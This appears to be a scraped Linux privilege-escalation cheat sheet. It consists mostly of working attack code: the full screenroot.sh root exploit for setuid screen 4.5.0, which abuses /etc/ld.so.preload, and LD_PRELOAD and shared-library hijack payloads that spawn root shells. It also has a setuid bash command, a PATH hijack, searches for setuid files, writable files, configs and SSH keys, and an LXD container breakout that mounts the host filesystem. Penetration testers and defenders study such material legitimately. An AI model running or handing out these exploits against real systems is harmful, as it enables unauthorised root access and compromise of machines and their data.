Copy # Check Linux OS Versino
uname -a Vulnerable Services (Screen)
Copy # Check Version
screen -v
Copy #!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/stat.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c -Wno-implicit-function-declaration
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell
Copy # Find Write Able Files
find / -path /proc -prune -o -type f -perm -o+w 2> /dev/null
Copy # Add
chmod u+s /bin/bash
Copy # Find Setuid
find / -user root -perm -4000 -exec ls -ldb {} \; 2> /dev/null
# Find Setgid
find / -user root -perm -6000 -exec ls -ldb {} \; 2> /dev/null PATH is an environment variable that specifies the set of directories where an executable can be located.
Copy # Add Current Directory to Path
PATH = .: ${PATH}
export PATH
# Verify Path
echo $PATH
Copy # Enumerate Spool / Mail Directory for Creds
find / ! -path "*/proc/*" -iname "*config*" -type f 2> /dev/null
# SSH Keys
ls ~/.ssh
Copy # Check Shared Libaries
ldd /bin/ls
# Abuse LD_PRELOAD
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init () {
unsetenv( "LD_PRELOAD" );
setgid(0 );
setuid(0 );
system( "/bin/bash" );
}
# Compile
gcc -fPIC -shared -o root.so root.c -nostartfiles
# Run Sudo
sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart
Copy # Check Shared Libraries
ldd < bi n >
# Check Load Location
readelf -d < bi n > | grep PATH
# Malicous Library
#include<stdio.h>
#include<stdlib.h>
void dbquery () {
printf ( "Malicious library loaded\n" );
setuid(0 );
system( "/bin/sh -p" );
}
# Compile
gcc root.c -fPIC -shared -o /development/libshared.so
Copy # Check Group
id
# if LXD is inside the group
# Import Image
lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine
# Start Privileged Container
lxc init alpine r00t -c security.privileged= true
# Mount Host
lxc config device add r00t mydev disk source=/ path=/mnt/root recursive= true
# Start Container
lxc start r00t
# Get Shell
lxc exec r00t /bin/sh 